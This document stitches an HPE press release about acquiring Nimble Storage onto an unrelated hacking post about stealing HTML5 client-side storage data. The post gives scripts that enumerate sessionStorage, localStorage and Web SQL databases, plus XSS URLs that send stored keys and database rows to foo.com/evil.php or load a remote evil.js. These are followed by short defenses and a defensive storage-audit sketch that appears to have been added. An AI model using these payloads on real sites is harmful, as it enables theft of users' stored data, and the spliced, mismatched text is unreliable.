HPE completes Nimble Storage acquisition

HPE has completed the acquisition of Nimble Storage, now a Hewlett Packard Enterprise company. This acquisition builds on our strategy to make Hybrid IT simple, through software defined infrastructure with a modern flash-optimized storage foundation. A report by IDC called the acquisition a “bold, strategic move” that will benefit our customers—and HPE couldn’t agree more.
The Nimble Storage offerings for predictive all-flash for entry to midrange segments are complementary to our scalable midrange to high-end HPE 3PAR solutions and affordable HPE MSA products. In addition, HPE will incorporate the InfoSight Predictive Analytics platform by Nimble Storage across our existing storage portfolio, which will enable continuity of products and deliver a transformed customer support experience.
With this acquisition, HPE will offer a full range of best-in-class all-flash storage solutions that will enable customers to compose the right storage for their exact application needs. Our comprehensive, flash-optimized storage portfolio across all workloads and resource requirements will provide:
  • Enterprise class for the all-flash datacenter: HPE 3PAR supports customers experiencing rapid growth and needing a highly scalable, all-flash data center capable of supporting up to millions of IOPS, petabyte capacity, and a multi-tenant architecture—priced from midrange to high-end.
  • Straightforward predictive flash: Nimble Storage is ideal for midmarket customers needing advanced, flash-optimized data services, including all-flash, hybrid-flash, and multicloud support, underpinned by machine-learning based predictive analytics, all at entry to midrange price points and designed with ease-of-use at its core.
  • Simple flash acceleration: HPE MSA and HPE StoreVirtual have an installed base of over 500,000 deployments worldwide and are suited for price-sensitive small site customers that need simple, flash tiering support at an entry price point.
  • Built-for-enterprise hyperconverged infrastructure: Nimble Storage also complements our recent SimpliVity acquisition for the growing hyperconverged market for those deploying turnkey VM-farms. The combination of SimpliVity, Nimble Storage, and HPE 3PAR enables customers to deploy the right data services across all workloads, scale and deployment types.

Client-side Storage using HTML5: really secure or just an abuse?

HTML5 has introduced new ways to save large amounts of data on the PC through the browser (use Chromium or Chrome to see how this works). Hackers could steal or modify sensitive data online or offline. If a web application that uses this kind of client-side storage is vulnerable to XSS attacks, an attack payload can read or modify the content of known storage keys on the victim's computer. If the web application loads data or code from local storage, it is also possible to inject malicious code that will be executed every time the web application requests it.

Working technique: (100% working technique, I got success while doing this, you just have to use your brain)

Storage Object Enumeration

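// Collect the key names held in sessionStorage.
var ss = "";
for (var i in window.sessionStorage)
{
    ss += i + " ";
}
// Collect the key names held in localStorage.
var ls = "";
for (var i = 0; i < localStorage.length; i++)
{
    ls += localStorage.key(i) + " ";
}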

Database Object Enumeration

// Collect the names of global variables that hold a Database object.
var db = "";
for (var i in window)
{
    if (window[i] == "[object Database]")
    {
        db += i + " ";
    }
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()

One Shot Attack:

http://blah_blah.com/page.php?name=<script>document.write('<img src="http://foo.com/evil.php?name=' %2B globalStorage[location.hostname].mykey %2B '">');</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql("SELECT * FROM client_tb", [], function(tx, result){ document.write('<img src="http://foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B '">'); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js></script>


Defenses
Website: Avoid saving sensitive data on the user's machine and clear
the client-side storage whenever possible.

Web Browser: Web users should regularly check the content of the
HTML5 client-side storage saved by their browser (delete?).
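
A defensive sketch of the two recommendations above, plus the earlier point about applications that load data or code from local storage. This is an added example, not code from the original post. The function names, pattern lists and sample contents are assumptions, and the in-memory stand-in only exists so it runs under Node (in a browser, pass localStorage or sessionStorage instead).

```javascript
// Heuristics below are assumptions for illustration; tune them for your application.
const VALUE_PATTERNS = [
  { label: "jwt", re: /^eyJ[\w-]+\.[\w-]+\.[\w-]*$/ },
  { label: "markup-or-script", re: /<\s*script|javascript:|\bon\w+\s*=/i },
];
const KEY_PATTERN = /pass(word)?|token|secret|session|auth/i;
// Report keys whose name or value suggests data that should not be stored client-side.
function auditStorage(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = String(storage.getItem(key));
    const reasons = VALUE_PATTERNS.filter((p) => p.re.test(value)).map((p) => p.label);
    if (KEY_PATTERN.test(key)) reasons.push("sensitive-key-name");
    if (reasons.length) findings.push({ key, reasons });
  }
  return findings;
}
// Remove every flagged key (for example on logout); returns the removed key names.
function purgeFlagged(storage) {
  const keys = auditStorage(storage).map((f) => f.key);
  keys.forEach((k) => storage.removeItem(k));
  return keys;
}
// Treat stored values as untrusted input: parse as JSON, check the shape, never eval or inject.
function readProfile(storage, key) {
  let obj;
  try { obj = JSON.parse(storage.getItem(key)); } catch (e) { return null; }
  const ok = obj && typeof obj.name === "string" && /^[\w .-]{1,64}$/.test(obj.name);
  return ok ? { name: obj.name } : null;
}
// In-memory stand-in for the Web Storage interface (constructed for offline use).
function makeMemoryStorage(initial) {
  const m = new Map(Object.entries(initial));
  return {
    get length() { return m.size; },
    key: (i) => Array.from(m.keys())[i] ?? null,
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    removeItem: (k) => { m.delete(k); },
  };
}

// Constructed sample contents; the token is a placeholder, not a real credential.
const sample = makeMemoryStorage({
  theme: "dark", profile: '{"name":"Alice"}',
  auth_token: "eyJhbGciOiJub25lIn0.eyJzdWIiOiJkZW1vIn0.c2ln",
  cached_widget: '<script src="https://cdn.example/w.js"></script>',
});
console.log(auditStorage(sample));
```

The audit flags auth_token (token-shaped value under a sensitive key name) and cached_widget (stored markup that the application would later execute), while readProfile rejects any stored value that is not the expected plain-data shape.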

LSO Storage Locations: (I know only for Linux, not a Windows user unfortunately :p)

Linux:

/home/$user/.macromedia/Flash_Player/#SharedObjects
